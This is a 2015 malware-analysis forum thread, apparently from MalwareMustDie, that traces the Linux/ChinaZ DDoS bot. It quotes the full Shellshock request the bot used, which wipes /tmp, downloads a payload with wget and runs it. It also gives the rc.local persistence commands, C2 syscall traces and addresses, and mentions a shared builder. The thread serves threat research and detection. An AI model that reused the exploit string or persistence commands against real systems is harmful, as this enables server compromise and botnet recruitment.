Linux/ChinaZ.DDoS

Forum for analysis and discussion about malware.

Linux/ChinaZ.DDoS

Postby unixfreaxjp » Tue Jan 13, 2015 5:31 pm

The ELF's VT is: https://www.virustotal.com/en/file/92fd ... /analysis/
Out initial draft report: https://pastebin.com/raw.php?i=gf4xrB9n
This threat was detected just recently, via attacks via shellshock:
Code: Select all
/bin/bash -c \"rm -rf /tmp/*;echo wget http://xxxx:81/9521 -O /tmp/China.Z-gxak\x80 >>
 /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-gxak\x80 >>
/tmp/Run.sh;echo /tmp/China.Z-gxak\x80 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;
chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget
 http://xxxx:81/9521 -O /tmp/China.Z-gxak\x80 >> /tmp/Run.sh;echo echo By China.Z >>
/tmp/Run.sh;echo chmod 777 /tmp/China.Z-gxak\x80 >> /tmp/Run.sh;echo /tmp/China.Z-gxak\x80 >>
/tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\""

The above request was reported to be generated from Windows version of the shellshock scanner binary with the below trace:
VT is: https://www.virustotal.com/en/file/ae67 ... /analysis/ < noted: LOW detection..
Code: Select all
.rdata:0057D808 aBinBashCRmRfTm db '() { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget %s -O /tmp/China'
.rdata:0057D808                                         ; DATA XREF: StartAddress+124o
.rdata:0057D808                 db '.Z-%s >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chm'
.rdata:0057D808                 db 'od 777 /tmp/China.Z-%s >> /tmp/Run.sh;echo /tmp/China.Z-%s >> /tm'
.rdata:0057D808                 db 'p/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Ru'
.rdata:0057D808                 db 'n.sh;/tmp/Run.sh"',0

The ELF payload was served in a hacked windows system served this ELF with the HFS server:
Image

The calls, subs & function name is obfuscated, yet some new uniq typical characteristics can be spotted like below for the detection purpose:
Image

Image

Image

registration for the autostart is using /etc/rc.local modification:
Code: Select all
sed -i -e '/exit/d' /etc/rc.local
sed -i -e '2 i//ChinaZ' /etc/rc.local

It hammered SE Linux, using hosts.conf - resolve.conf - and libnss as DNS resolver, and generated the backdoor is as per below, noted: not necessarily using hostname basis.
Code: Select all
SYSCALL5A, send(3, "cM\1\0\0\1\0\0\0\0\0\0\2aa\5gm352\3com\0\0\1\0\1", 30, MSG_NOSIGNAL)
SYSCALL5B, recvfrom(3, "cM\201\200\0\1\0\1\0\5\0\5\2aa\5gm352\3com\0\0\1\0\1\300\f"..., 1024, 0,
           $PARAMS:{sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("202.238.95.24")}, [16])
SYSCALL5C, connect(3, {sa_family=AF_INET, sin_port=htons(9521), sin_addr=inet_addr("121.12.173.173")}, 16)
SYSCALL5D, write(3, "\0\0\0\0Linux2.6.2-4-686-\0\275w\267\0\1\0\0"..., 168) = 168

In this particular sample it calls CNC in aa.gm352.com (121.12.173.173:9521) at ASN 58543 | 121.12.168.0/21 | CHINATELECOM-HUNAN-H
Code: Select all
$ my_lookup aa.gm352.com
aa.gm352.com.           300     IN      A       121.12.173.173
gm352.com.              3600    IN      NS      ns4.he.net.
gm352.com.              3600    IN      NS      ns3.he.net.
gm352.com.              3600    IN      NS      ns2.he.net.
gm352.com.              3600    IN      NS      ns1.he.net.
gm352.com.              3600    IN      NS      ns5.he.net.
 
$ mycnccheck 121.12.173.173:9521
Connection to 121.12.173.173 9521 port [tcp/*] succeeded!
IPv4   TCP MMD.KickUR.ASS:36555->121.12.173.173:9521 (ESTABLISHED)

Image

Due to the unique new infection pair shellshock (scanner-payload), new functions & new signature used, we consider this is a new China DDOSer variant: "ChinaZ"
#MalwareMustDie!
*) Threat found by B of MMD ELF Team
You do not have the required permissions to view the files attached to this post.
unixfreaxjp
 
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm
Reputation point: 89

Re: Linux/ChinaZ.DDoS

Postby unixfreaxjp » Sat Jan 17, 2015 4:03 pm

New infection on steroids.. Linux/ChinaZ.DDoS.
The shellshock drives the infection into the utmost speed.. ALERT!!
Image
https://www.virustotal.com/en/file/b337 ... 421439503/
CNC: 121.12.173.173:9521
#MalwareMustDie! ELF Team
You do not have the required permissions to view the files attached to this post.
unixfreaxjp
 
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm
Reputation point: 89

Re: Linux/ChinaZ.DDoS

Postby unixfreaxjp » Sat Jan 17, 2015 8:58 pm

The modular version of the ChinaZ in dynamic ELFs (w/shared libs).
Detection ratio is literally ZERO for these modules:
DDoSClient:
https://www.virustotal.com/en/file/b540 ... /analysis/
https://www.virustotal.com/en/file/a86b ... 421490630/
DDosStarter:
https://www.virustotal.com/en/file/daaa ... 421491358/
https://www.virustotal.com/en/file/daaa ... 421491358/

Analysis is in MMD blog: http://blog.malwaremustdie.org/2015/01/ ... ml#modular
Please credit #malwaremustdie for this findings.
You do not have the required permissions to view the files attached to this post.
unixfreaxjp
 
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm
Reputation point: 89

Re: Linux/ChinaZ.DDoS

Postby unixfreaxjp » Sun Jan 18, 2015 7:06 am

I am sorry to write this in the ELF threat, it is so related to the post in viewtopic.php?f=16&t=3682#p24982
Windows version of the ChinaZ client attacker is also spotted in a set of ELF samples.
Image
I wrote the summary of my reversing in VT: https://www.virustotal.com/en/file/714e ... /analysis/
#MalwareMustDie!
You do not have the required permissions to view the files attached to this post.
unixfreaxjp
 
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm
Reputation point: 89

Re: Linux/ChinaZ.DDoS

Postby ilaloyka » Mon Feb 02, 2015 12:01 pm

I don't get the malware which shared by you. How to get the malware. I'm sorry.
Hi, What does it mean `DDosWorksServerEeCodeKey` in 8048194
ilaloyka
 

Re: Linux/ChinaZ.DDoS

Postby ilaloyka » Fri May 29, 2015 12:10 pm

New ip address is 137.175.13.210:9521
ilaloyka
 

Re: Linux/ChinaZ.DDoS

Postby unixfreaxjp » Sat Jun 20, 2015 2:28 am

New variant of ELF Linux/ChinaZ
Image

Image

VT (4/57): https://www.virustotal.com/en/file/82d3 ... 434758775/
Analysis: http://blog.malwaremustdie.org/2015/06/ ... oaded.html
ELF samples shared in kernelmode.info only - #malwaremustdie
You do not have the required permissions to view the files attached to this post.
unixfreaxjp
 
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm
Reputation point: 89

Re: Linux/ChinaZ.DDoS

Postby unixfreaxjp » Wed Jul 01, 2015 1:07 pm

Linux/ChinaZ.DDoS binary builder for x32/x64 (and Win x32) is shared in here for raising the detection ratio of the threat, for research and mitigation purpose.
WARNING! This is not a toy for fun, but a crimeware tool, using this online w/o good handling can create damage on any service will violate the law and can cause your internet service will be blacklisted or worse blocked, so the risk is all yours. Please analyze it in your test environment only.

Please read analysis in MalwareMustDie for the more info and the source of the threat: http://blog.malwaremustdie.org/2015/06/ ... es-on.html
VT=NULL: https://www.virustotal.com/en/file/59e6 ... /analysis/
Image

Snapshot:
Image

Builder Interface:
Image

Binary templates:
Image

Binary ELF templates contains ChinaZ github codes:
Image

We can not share the Win32 template (N/A) & CNC tools (forbidden by law, it'll be beyond research category for openly shared, I can go to jail), please contact in PM with your detail info to record the share. Sorry for the bummer, please bear with the safety procedure. For the snapshot of CNC tool are in MMD post, VT: https://www.virustotal.com/en/file/8b58 ... /analysis/

#MalwareMustDie's work & share to anti malware community.
You do not have the required permissions to view the files attached to this post.
unixfreaxjp
 
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm
Reputation point: 89

Re: Linux/ChinaZ.DDoS

Postby unixfreaxjp » Tue Aug 11, 2015 6:52 am

You do not have the required permissions to view the files attached to this post.
unixfreaxjp
 
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm
Reputation point: 89

Re: Linux/ChinaZ.DDoS

Postby unixfreaxjp » Mon Sep 21, 2015 12:02 pm

The ChinaZ "Edition 2.0" (they called it)
Image

Image

Image

spotted in infection on going busy panel:
Image

Sample is only detected by 5/five antiviruses 8-)
https://www.virustotal.com/en/file/bae6 ... /analysis/
You do not have the required permissions to view the files attached to this post.
unixfreaxjp
 
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm
Reputation point: 89

Next

Return to Malware

Who is online

Users browsing this forum: No registered users and 10 guests